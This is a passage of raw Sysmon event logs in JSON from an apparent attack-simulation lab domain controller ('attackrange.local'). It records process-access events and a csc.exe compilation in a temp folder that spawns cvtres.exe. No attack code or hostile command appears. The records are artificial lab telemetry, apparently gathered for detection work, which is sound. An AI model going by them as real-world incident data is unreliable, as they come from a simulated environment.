l+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5653,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.588\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.588","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5654,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.588\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.588","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5655,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.588\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.588","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5656,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.588\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.588","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5657,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.588\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.588","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5658,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.588\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.588","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5659,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.588\r\nSourceProcessGUID: {E2A3D6B1-11D4-5F25-0000-00100D0C0800}\r\nSourceProcessId: 796\r\nSourceThreadId: 2504\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D6-5F25-0000-00101A500800}\r\nTargetProcessId: 4968\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.588","SourceProcessGUID":"{E2A3D6B1-11D4-5F25-0000-00100D0C0800}","SourceProcessId":"796","SourceThreadId":"2504","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11D6-5F25-0000-00101A500800}","TargetProcessId":"4968","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5660,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.662\r\nProcessGuid: {E2A3D6B1-11D6-5F25-0000-0010EC530800}\r\nProcessId: 4972\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nFileVersion: 12.00.52519.0 built by: VSWINSERVICING\r\nDescription: Microsoft® Resource File To COFF Object Conversion Utility\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CVTRES.EXE\r\nCommandLine: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RESEB80.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\pgch3ubf\\CSCE40CF1F289864831B58BC676D828E40.TMP\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D4-5F25-0000-00205F0B0800}\r\nLogonId: 0x80B5F\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF\r\nParentProcessGuid: {E2A3D6B1-11D6-5F25-0000-00101A500800}\r\nParentProcessId: 4968\r\nParentImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nParentCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\pgch3ubf\\pgch3ubf.cmdline\"","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.662","ProcessGuid":"{E2A3D6B1-11D6-5F25-0000-0010EC530800}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","FileVersion":"12.00.52519.0 built by: VSWINSERVICING","Description":"Microsoft® Resource File To COFF Object Conversion Utility","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"CVTRES.EXE","CommandLine":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RESEB80.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\pgch3ubf\\CSCE40CF1F289864831B58BC676D828E40.TMP\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D4-5F25-0000-00205F0B0800}","LogonId":"0x80b5f","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF","ParentProcessGuid":"{E2A3D6B1-11D6-5F25-0000-00101A500800}","ParentProcessId":"4968","ParentImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","ParentCommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\pgch3ubf\\pgch3ubf.cmdline\"","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
